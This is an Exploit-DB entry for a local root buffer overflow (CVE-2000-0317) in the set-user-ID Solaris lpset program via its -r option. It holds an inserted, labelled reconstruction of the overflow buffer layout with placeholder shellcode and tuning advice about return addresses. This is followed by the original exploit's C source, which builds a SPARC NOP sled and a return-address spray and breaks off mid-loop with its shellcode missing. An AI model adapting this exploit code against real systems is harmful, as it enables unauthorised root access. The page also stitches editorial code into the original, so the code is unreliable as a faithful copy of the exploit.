Solaris 2.6/7.0 - lpset -r Buffer Overflow Vulnerability 2

ID EDB-ID:19873
Type exploitdb
Reporter Theodor Ragnar Gislason
Modified 2000-04-24T00:00:00


Solaris 2.6/7.0 lpset -r Buffer Overflow Vulnerability (2). CVE-2000-0317. Local exploit for the Solaris platform.

A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented, so its intended use is unknown. However, the argument given to -r is copied into a fixed-size stack buffer without a length check, and because lpset is installed set-user-ID root, supplying a well-crafted buffer containing executable code makes it possible to execute arbitrary commands as root. Note that the payload travels as a command-line argument: it is a C string, so it must contain no NUL byte before its end, and the NOP filler and the guessed return address below are chosen with that constraint in mind.
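The exploit on this page is truncated and its shellcode bytes are missing, so the following is an added, host-portable example (written for this edit, not the author's code) that reproduces the buffer layout the exploit builds for the -r argument: a NOP sled over the whole buffer, a window of repeated return addresses at [START, END), and the payload placed after the window. Words are stored big-endian as a SPARC CPU would read them, so the layout can be inspected on any machine. The shellcode is a constructed marker, the return address 0xeffff5a0 and the payload offset 2000 are assumptions for illustration, and the check that the argument contains no NUL byte is the caveat a practitioner would add, since an embedded NUL would silently cut the argv string short.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constants taken from the exploit on this page. */
#define BSIZE  18001
#define START  700
#define END    1200
#define NOP    0xac15a16eUL   /* SPARC sled filler; no byte of it is zero */

/* Constructed stand-in for the elided shellcode: a marker, NOT real code. */
static const unsigned char fake_shellcode[] = {
    0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88
};

/* Big-endian word accessors so the layout matches what SPARC sees. */
static void put_be32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);  p[3] = (unsigned char)v;
}
static uint32_t get_be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Build the lpset -r argument: NOP sled everywhere, the guessed return
 * address repeated over [START,END), the payload at sc_off.  Returns a
 * malloc'd buffer of BSIZE bytes plus a terminating NUL, or NULL if the
 * payload would fall outside the buffer or overlap the return window. */
unsigned char *build_buffer(uint32_t ret, const unsigned char *sc,
                            size_t sclen, size_t sc_off) {
    size_t i;
    unsigned char *buf;

    if (sc_off + sclen > BSIZE) return NULL;
    if (sc_off < END && sc_off + sclen > START) return NULL;

    buf = malloc(BSIZE + 1);
    if (!buf) return NULL;

    /* Sled: BSIZE is not a multiple of 4, so the last partial word gets
     * a constructed non-zero filler instead of running past the buffer. */
    for (i = 0; i + 4 <= BSIZE; i += 4) put_be32(buf + i, NOP);
    for (; i < BSIZE; i++) buf[i] = 0x41;

    /* Spray the return address; START and END are word aligned. */
    for (i = START; i + 4 <= END; i += 4) put_be32(buf + i, ret);

    memcpy(buf + sc_off, sc, sclen);
    buf[BSIZE] = '\0';
    return buf;
}

/* The buffer is passed through argv[], so any NUL before the terminator
 * truncates it.  Returns the index of the first NUL in [0,len), or -1. */
long first_nul(const unsigned char *buf, size_t len) {
    size_t i;
    for (i = 0; i < len; i++) if (buf[i] == 0) return (long)i;
    return -1;
}

/* Word at a byte offset, as the CPU would read it. */
uint32_t word_at(const unsigned char *buf, size_t off) {
    return get_be32(buf + off);
}

int main(void) {
    uint32_t ret = 0xeffff5a0UL;  /* assumed address inside the sled */
    unsigned char *b = build_buffer(ret, fake_shellcode,
                                    sizeof fake_shellcode, 2000);
    if (!b) { fprintf(stderr, "layout rejected\n"); return 1; }
    printf("len=%zu first_nul=%ld word[0]=%08x word[700]=%08x word[1200]=%08x\n",
           strlen((char *)b), first_nul(b, BSIZE),
           word_at(b, 0), word_at(b, 700), word_at(b, 1200));
    free(b);
    return 0;
}
```

A return address such as 0xef00f5a0 would pass the alignment and window checks but fail the NUL check, which is exactly the kind of value a guessed offset can produce; the exploit's offset argument should be adjusted until the address is NUL-free.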

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>     /* malloc(), atoi(), exit() */
#include <sys/types.h>  /* u_long */

#define BSIZE 18001     /* size of the argument handed to lpset -r */
#define OFFSET 20112    /* default distance from our %sp to the guessed target frame */
#define START 700       /* byte range of the buffer that is filled with the return address */
#define END 1200

#define NOP 0xac15a16e  /* SPARC instruction used as sled filler; contains no NUL byte */

#define EXSTART 116

/* The shellcode string literal is not reproduced on this page; only the
 * author's section comments survive.  It must be supplied for this to build. */
char sparc_shellcode[] =

/* setreuid(0,0) */

/* other stuff */

/* Read the current stack pointer; SPARC-specific inline assembly, the
 * value is left in %i0 which is the return register of this leaf function. */
u_long get_sp() { asm("mov %sp, %i0"); }

int main(int argc, char *argv[]) {
        int i,ofs=OFFSET,start=START,end=END;
        u_long ret, *ulp;
        char *buf;

        /* optional first argument overrides the stack offset guess */
        if (argc > 1) ofs=atoi(argv[1])+8;

        /* one extra word of slack so the word-aligned fill below stays in bounds
         * (BSIZE is not a multiple of 4) */
        if (!(buf = (char *) malloc(BSIZE+4))) {
                fprintf(stderr, "out of memory\n");
                exit(1);
        }

        /* guessed address inside the NOP sled of lpset's overflowed frame */
        ret = get_sp() - ofs;

        /* fill the whole buffer with the NOP sled */
        for (ulp = (u_long *)buf,i=0; ulp < (u_long *)&buf[BSIZE]; i+=4,ulp++)
                *ulp = NOP;

        /* overwrite the window [START,END) with the return address so that
         * whichever word lands on the saved return slot redirects into the sled */
        for (i = start, ulp=(u_long *)&buf[start]; i < end; i+=4) *ulp++ = ret;
        for (